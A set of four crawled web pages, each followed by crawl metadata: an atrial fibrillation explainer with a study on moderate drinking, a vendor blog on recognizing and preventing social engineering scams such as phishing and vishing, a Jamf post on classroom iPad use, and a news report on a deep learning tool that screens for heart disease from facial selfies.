Atrial fibrillation is an irregular and often rapid heart rate that can increase your risk of stroke, heart failure and other heart-related complications. During atrial fibrillation, the heart’s two upper chambers (the atria) beat chaotically and irregularly — out of coordination with the two lower chambers (the ventricles) of the heart. Atrial fibrillation symptoms often include heart palpitations, shortness of breath and weakness. Episodes of atrial fibrillation can come and go, or you may develop atrial fibrillation that doesn’t go away and may require treatment. Although atrial fibrillation itself usually isn’t life-threatening, it is a serious medical condition that sometimes requires emergency treatment. It may lead to complications. Atrial fibrillation can lead to blood clots forming in the heart that may circulate to other organs and lead to blocked blood flow (ischemia). Treatments for atrial fibrillation may include medications and other interventions to try to alter the heart’s electrical system. Some people with atrial fibrillation have no symptoms and are unaware of their condition until it’s discovered during a physical examination. Those who do have atrial fibrillation symptoms may experience signs and symptoms such as: - Palpitations, which are sensations of a racing, uncomfortable, irregular heartbeat or a flip-flopping in your chest - Reduced ability to exercise - Shortness of breath - Chest pain Atrial fibrillation may be: - Occasional. In this case it’s called paroxysmal (par-ok-SIZ-mul) atrial fibrillation. You may have symptoms that come and go, lasting for a few minutes to hours and then stopping on their own. - Persistent. With this type of atrial fibrillation, your heart rhythm doesn’t go back to normal on its own. If you have persistent atrial fibrillation, you’ll need treatment such as an electrical shock or medications in order to restore your heart rhythm. - Long-standing persistent. This type of atrial fibrillation is continuous and lasts longer than 12 months. - Permanent. In this type of atrial fibrillation, the abnormal heart rhythm can’t be restored. You’ll have atrial fibrillation permanently, and you’ll often require medications to control your heart rate. Alcohol is ubiquitous in Western society, and rates of excessive use among adults remain high. In a new study published in HeartRhythm, the official journal of the Heart Rhythm Society and the Cardiac Electrophysiology Society, Australian researchers showed that regular moderate alcohol consumption (an average of 14 glasses per week) results in more electrical evidence of scarring and impairments in electrical signaling compared with non-drinkers and light drinkers. Alcohol consumption is therefore an important modifiable risk factor for AF. AF is an abnormal heart rhythm characterized by rapid and irregular beating of the atria (the two upper chambers of the heart). Observational studies suggest that even moderate regular alcohol consumption may increase the risk of AF. A meta-analysis of seven studies involving nearly 860,000 patients and approximately 12,500 individuals with AF demonstrated an eight percent increase in incident AF for each additional daily standard drink. Despite the association between regular alcohol intake and AF, however, detailed human electrophysiological studies describing the nature of alcohol-related atrial remodeling have been lacking. The purpose of this study was to determine the impact of different degrees of alcohol consumption on atrial remodeling using high-density electroanatomic mapping. In this multi-center cross-sectional study in Australia, investigators performed detailed invasive testing on the atria of 75 patients with AF, 25 in each of three categories: lifelong non-drinkers, mild drinkers, and moderate drinkers. Patients self-reported their average alcohol consumption in standard drinks per week (one standard glass is around 12 grams of alcohol) over the preceding 12 months. Patients consuming two to seven drinks per week were considered mild drinkers, while those consuming eight to 21 drinks per week (average 14 drinks per week) were defined as moderate drinkers. The investigators found that individuals who consumed moderate amounts of alcohol (average 14 drinks per week) had more electrical evidence of scarring and impairments in electrical signaling than non-drinkers and light drinkers. “This study underscores the importance of excessive alcohol consumption as an important risk factor in AF,” said lead investigator Professor Peter Kistler, MBBS, Ph.D., FHRS, from the Heart Centre, Alfred Hospital, Melbourne, Australia. “Regular moderate alcohol consumption, but not mild consumption, is an important modifiable risk factor for AF associated with lower atrial voltage and conduction slowing. These electrical and structural changes may explain the propensity to AF in regular drinkers. It is an important reminder for clinicians who are caring for patients with AF to ask about alcohol consumption and provide appropriate counselling in those who over-indulge.” More information: “Moderate alcohol consumption is associated with atrial electrical and structural changes: Insights from high-density left atrial electroanatomic mapping,” HeartRhythm, DOI: 10.1016/j.hrthm.2018.10.041
<urn:uuid:7aef7645-41a6-4f7a-b571-0c7919134ef4>
CC-MAIN-2022-40
https://debuglies.com/2019/01/10/atrial-fibrillation-even-moderate-alcohol-consumption-is-a-risk-factor/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00278.warc.gz
en
0.916134
1,156
3.140625
3
Reading time 10min To anyone keeping up with cybersecurity threats, there is an understanding that anti-fraud systems are becoming ever more advanced. And they need to, for the threat from fraudsters is growing, partly down to the professionalisation of fraud, with the necessary tools easily obtainable through dark web marketplaces. Despite the tools on both sides of the fraud fight becoming increasingly sophisticated, there has always been a weak link in the fraud protection ecosystem - one that can be exploited through social engineering attacks. So who will the fraudsters target to get what they want? Everyone. From average online users to company employees. Where media coverage of successful cybercrime activities may paint a picture of expert hackers breaking all sorts of security systems, the truth is, most fraudsters will choose the path of least resistance to bypass it all. This is why it is important to recognize the costs of social engineering attacks and prevent scams at the root of the problem. What are social engineering attacks? In layman terms, the basic psychology of social engineering is to manipulate individuals or groups of people into doing something that may or may not be in their best interest. This is accomplished through building trust. This is it in a nutshell, but the problem with this definition is that the consequences can be so easy to dismiss, with some people believing they couldn’t possibly fall victim to social engineering attacks. The truth is, they are at the root of the majority of successful account takeovers (ATO) and attempts to steal personal/sensitive information from people which can then be used by fraudsters to steal large sums of money or be the basis for a subsequent crime (identity theft, for example). The key to successful social engineering attacks is for fraudsters to take advantage of a user’s lack of knowledge, in this case, the full extent of potential dangers in the online domain. Picture the scenario where older users who are not tech-savvy are increasingly using eCommerce, M-Commerce and digital banking platforms - they are the perfect targets. Now imagine that the no. of such users boomed during the pandemic when COVID-19 pandemic lockdowns forced everyone online to continue shopping, banking and communicating. The no. of potential targets is huge, which is precisely what fraudsters love, in order to remain unseen in the vast ocean of online users. Such users don’t fully understand the value of their data, nor how to adequately protect it and themselves from the threats. So how can users recognize the threats associated with social engineering attacks? Common types of social engineering attacks - spot the signs! The common signs of social engineering attacks are that fraudsters will play with your emotions. They aim to make you willingly take action (not by the fraudster using a brute force attack on your online accounts), and the best way to do this is to you take an action when your emotions are heightened - when you are more likely to make irrational decisions. First and foremost, if you ever receive a suspicious communication, ask yourself if the following emotional triggers have been set off: - A heightened sense of urgency to take action. - Use of fear and/or anger to make you take action. - Curiosity has been built up for you to click on a link to discover more information. If the answer is yes to all of the above, then your guard should be fully up. And here are the types of social engineering attacks that can lead to heightened emotions: Phishing: one of the most common mass scams on the internet, affecting everyone from social media to digital banking users. This is the type of scam that is most often featured in global media coverage, typically associated with emails and suspicious links. Fraudsters will send emails that appear to be from reputable sources (near identical emails of an eCommerce store or even a bank, for example) with the goal of gaining personal information. The look of the email will often be professional (but not always), almost as though it has come from a reputable source. The aim is to build trust or even scare you into action, possibly stating that there is a security threat affecting your account (and therefore finances) asking you to immediately click on a link to resolve the issue. This link will either take you to a convincing copy of a website, requiring login credentials, at which point the user willingly types in the details, which are logged by the fraudster. It’s that simple, but worryingly effective. Spear Phishing: this is a refined form of phishing, defined by its ‘hunt’ for high-value targets! Whereas regular mass email phishing can be rather opportunistic, spear phishing usually involves specific targets being sighted, such as management level or those with important roles (and accompanying systems access). If successful, a fraudster can gain not only valuable accounts, but also personal and company data which can be used for further criminal activities. SMiShing: Almost everyone has a smartphone today. The pool of potential targets is therefore massive. Fraudsters will send thousands of mobile phone text messages (SMS) to influence victims into immediate action. These actions may include a request to download mobile malware, visiting a malicious website to obtain your personal details. Even more boldly, there may be a request to call a fraudulent phone number. Some individuals may write back, and this leads to… Vishing: fraudsters will attempt to elicit information or attempt to influence action via a phone. The number itself may look legitimate through the process of ‘phone spoofing’ where it imitates a caller ID a user may have stored in their contacts list, therefore building trust between the user and the fraudster on the other side who will impersonate the role of a bank employee, for example, explaining that there is a problem with an account that requires immediate action. The main goal of vishing is to obtain valuable information that could contribute to the direct compromise of a user’s account or even an organization. Baiting: when phishing scams try to manipulate users into opening a suspicious link or download malware, the sense or urgency and fear factor are common. Baiting, on the other hand, plays on the curiosity of individuals to open/download with the promise of a free high-value prize (either a cash or electronic item) or even to download some free music tracks, which is usually malware disguised as an audio file. Examples of successful social engineering attacks Don’t allow yourself to believe that you are immune to fraud attempts. Although we wouldn’t wish for anyone to adopt a sense of constant paranoia that they are about to be defrauded, the best approach is to keep your guard up at all times. This applies to private individuals, big companies, and all employees from lower level right up to the top management. Never allow for a weak link in a chain to be exploited. One of the best examples of how even tech and security companies can be duped by social engineering attacks occurred in 2011. An attack on RSA Security began with a basic email phishing scam that was sent to low-level employees. The email looked like a legitimate internal recruitment communication and the attachment (malware disguised as a normal file) was opened by one employee - this action disrupted RSA’s two-factor authentication service, SecurID. It is important to note that it only takes one person within a company to open a suspicious attachment for it to cause havoc. Recently (February 2022), Morgan Stanley revealed a handful of wealth management accounts were breached by fraudsters using the vishing technique. Morgan Stanley’s own systems were not compromised, however, customers were duped into revealing personal details to who they believed was a bank employee. The fraudsters were able to spoof their caller ID to gain the trust of the customers; once they gained access to accounts, money transfers were made to the fraudsters' own accounts. How to prevent social engineering attacks Many online users expect advanced security protocols to be used by eCommerce merchants and financial institutions, however, the same expectation should be applied to all online users. Practicing good digital hygiene is essential to severely impacting the success rates of all social engineering attacks, and indeed, any types of online fraud. So what are some common steps the average user should take to ensure their online security? Aside from education, understanding what social engineering attacks are, and how they are orchestrated, there are some additional steps you can take to make a fraudster's aim of defrauding you that little bit harder. The more savvy you are, the likelihood of failure for the fraudster. - Always create strong and long passwords with a mix of uppercase and lowercase letters, numbers, special characters etc. - Consider using a password manager to securely store all your sensitive login details. All password managers are encrypted, making it very difficult to crack. - Keep software up to date on all devices you use, whether it’s on a desktop, laptop or mobile device - keep operating systems, programs & apps (such as anti-virus) up to date. Understanding that this is not just a regular chore, but patching security loopholes with the latest software version is essential for a safer online experience. - Where possible, use multi-factor authentication for online accounts, especially when dealing with financial services accounts. - Be aware how precious your private data is, and how it can be used against you by fraudsters to enable further acts of cybercrime. Simple steps can be to limit the information you share on social media accounts - date and place of birth, email and home addresses, phone no. etc. - Use a VPN (virtual private network) when you are connected to public wifi. A VPN is essentially a guarded (encrypted) gateway for you to surf the internet and maintain a level of privacy - invisible to prying eyes. - Make sure each time you surf online that you are using secure web pages (https://) - you can use HTTPS Everywhere addon to your browser that enables https whenever possible. Stop social engineering attacks before they happen - advanced fraud prevention is crucial Aside from personal steps individuals can take, it is undeniably important for major financial institutions and eCommerce companies to use the latest tech in order to keep their databases and payment processes safe, and in turn ensure the safety of their customers’ personal information. Going further, internal education is certainly key to ensuring employees are trained to understand and identify the risks and prevent potential social engineering attacks succeeding within their organisations. And what of advanced fraud detection and prevention solutions? This is where the progress of artificial intelligence (AI) and machine learning (ML) models in FinTech shine through in their capabilities to effectively stamp out the threat of fraud. If a fraudster has successfully taken over user accounts, advanced fraud solutions can detect deviations from the regular behavioral patterns of an account holder. It may sound easy for a fraudster to mask their identity, location, device and network settings, however, with digital fingerprinting, 5,500+ pieces of data are analysed in conjunction with behavioral biometrics to paint an accurate picture of every single user. The tiniest details of how they interact with a service can be used to distinguish genuine users from fraudsters. What does this mean in terms of preventing social engineering attacks? They can be detected and prevented from succeeding. At Nethone, we have a proven track record of helping banks deal with social engineering attacks. Education is crucial to stop fraudsters, but so too is some impressive tech! If you wish to detect and protect your business from social engineering attacks, we're here to help you with the perfect fraud prevention solution...
<urn:uuid:1b4d01e8-370c-4f26-a35e-aa8b5b1c9469>
CC-MAIN-2022-40
https://nethone.com/post/social-engineering-attacks-how-to-recognize-and-prevent-scams
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00278.warc.gz
en
0.939694
2,377
2.546875
3
Unleash the power of Apple in education Mathew Pullen shared how unlocking the full potential of technology in the classroom enhances creativity in learning and produces positive critical outcomes for students. He noted that while we’ve seen the embrace of technology such as iPads in the classroom over the past few years with remote learning, it’s often been used as a replication of what would have been done face-to-face. Pullen discussed how educators can develop creatives uses for iPads for both teachers and students to take full advantage of the possibilities, and recommended tools that can help. How learners share knowledge One of the reasons Apple technology powers creativity is the availability of built-in tools that give learners a choice in how to share their knowledge, and demonstrate their understanding. Pullen shared new ways to utilize iPad tools including: - Apple pencil – used not only to replicate handwriting but as a drawing tool for sketch-noting - Microphone – share thoughts by removing the barrier of having to type - Text – use as keyboard, including emojis for expressing understanding - Camera – take photos, capture videos, incorporate voice to explore the world around them - Documents – easily share content and rich creative resources Preparation for the modern workplace In order to prepare students for the future, educators must understand the role that technology plays. According to the World Economic Forum Future of Jobs Report, the top projected skills in 2025 are creativity, critical thinking, and problem-solving. Optimizing the use of technology can help prepare students for the world of work. Pullen discussed exploring more creative methods of teaching, including using mobile technology which allows the world around us to become a creative environment. With students not having to sit at a desk, they can interact with the world, be analytical about it, and produce a creative and original result. Reign it in: providing scaffolded choice When thinking about how to use technology in the classroom, educators also need to be mindful of the risks of offering too many choices. The balancing act for teachers hinges on how to provide these exciting tools for students while still limiting potential distractions. With Jamf, you get the added ability to be able to provide focused access to the apps that students might need while removing any distractions to keep their creativity flowing. Pullen says students have unlimited potential - and wants them to see that anything is possible, and give them the opportunity to allow their creativity to flow. Using the proper tools allows us to scaffold learning in specific ways so we can focus attention where needed, and help students to succeed in the way that is best for them. Read more BETT Apple at School content: - Zero touch deployment: as easy as ABC - Streamlining deployments and updates in Mac labs - How Explain Everything fosters engaged learning - Learning technology at Heronsgate Primary School - Google + Apple at Holy Trinity CofE Primary School - iPad and Showbie: personalized feedback and impactful learning - Balancing tradition with innovation at RGS Worcester - Engaging AR learning activities for the classroom and home - From the classroom to full remote: a fast learning curve - Using Microsoft, Google and other identity providers with Jamf School - iPad learning anywhere, anytime Discover how Jamf can help your organization succeed with Apple. Watch the entire presentation now. Have market trends, Apple updates and Jamf news delivered directly to your inbox.
<urn:uuid:06edaf14-9c96-45d3-abf9-4fa3f21197b9>
CC-MAIN-2022-40
https://www.jamf.com/blog/focused-creativity-in-the-classroom-with-apple-and-jamf/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00278.warc.gz
en
0.937751
738
3.671875
4
Deep learning tool analyzes biometric data from selfies to detect heart disease New medical research published in the European Heart Journal discusses how four patient biometric “selfies” could be enough for a doctor to detect heart disease, thanks to a deep learning computer algorithm that analyzes facial features to expose coronary artery disease (CAD), writes Science Daily. The algorithm based on facial recognition techniques is still a prototype and requires further testing on people from a variety of ethnic groups, so that it could ultimately be deployed as a screening method for heart diseases. The biometric research was led by Professor Zhe Zheng, vice director of the National Center for Cardiovascular Diseases and vice president of Fuwai Hospital, Chinese Academy of Medical Sciences and Peking Union Medical College, Beijing, People’s Republic of China. “To our knowledge, this is the first work demonstrating that artificial intelligence can be used to analyze faces to detect heart disease,” said the professor in a prepared statement. “It is a step towards the development of a deep learning-based tool that could be used to assess the risk of heart disease, either in outpatient clinics or by means of patients taking ‘selfies’ to perform their own screening. This could guide further diagnostic testing or a clinical visit.” He continued: “Our ultimate goal is to develop a self-reported application for high risk communities to assess heart disease risk in advance of visiting a clinic. This could be a cheap, simple and effective of identifying patients who need further investigation. However, the algorithm requires further refinement and external validation in other populations and ethnicities.” The research cites industry knowledge that specific facial features can be linked to an increased risk of heart disease, such as thinning hair, wrinkles, ear lobe crease, and cholesterol deposits under the skin and around eyelids. The project involved the blood vessel study of 5,796 patients from eight hospitals in China between July 2017 and March 2019. Digital cameras were used to take four facial photos from different angles. Nurses interviewed patients about their socioeconomic status, lifestyle and medical history, while radiologists analyzed their angiograms. The information collected was then used to train the deep learning algorithm, which was next tested on 1,013 patients from nine hospitals. The test found that the deep learning algorithm performed better than existing heart disease prediction methods. It accurately detected heart problems in 80 percent of cases, and found that there was no heart disease in 61 percent of cases. The sensitivity was 80 percent and specificity 54 percent. “The algorithm had a moderate performance, and additional clinical information did not improve its performance, which means it could be used easily to predict potential heart disease based on facial photos alone,” explained Professor Xiang-Yang Ji, director of the Brain and Cognition Institute in the Department of Automation at Tsinghua University, Beijing, in a prepared statement. “The cheek, forehead and nose contributed more information to the algorithm than other facial areas. However, we need to improve the specificity as a false positive rate of as much as 46 percent may cause anxiety and inconvenience to patients, as well as potentially overloading clinics with patients requiring unnecessary tests.” The deep learning tool for clinical evaluation requires further testing in multiple ethnic groups, because the study was mostly conducted on similar patients. The project’s innovation was applauded; however, its limitations were pointed out in an article by Charalambos Antoniades, Professor of Cardiovascular Medicine at the University of Oxford, UK, and Dr. Christos Kotanidis, a DPhil student working under Professor Antoniades at Oxford. Some limitations include not validating the tool in a larger population and the ethical concerns about “unwanted dissemination of sensitive health record data, that can easily be extracted from a facial photo, renders technologies such as that discussed here a significant threat to personal data protection, potentially affecting insurance options.” Professor Zheng acknowledged some limitations to the research and emphasizes that privacy and ethics are important to the team, as is the guarantee that the tool would not be used for any other purposes except medicine. AI company Lapetus Solutions has been developing analytical solutions for the insurance market that leverage biometric facial recognition with selfies to treat the face as a biomarker of human aging.
<urn:uuid:2053e523-435b-4330-8468-ec049aa22b56>
CC-MAIN-2022-40
https://www.biometricupdate.com/202008/deep-learning-tool-analyzes-biometric-data-from-selfies-to-detect-heart-disease
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00478.warc.gz
en
0.952936
880
3.265625
3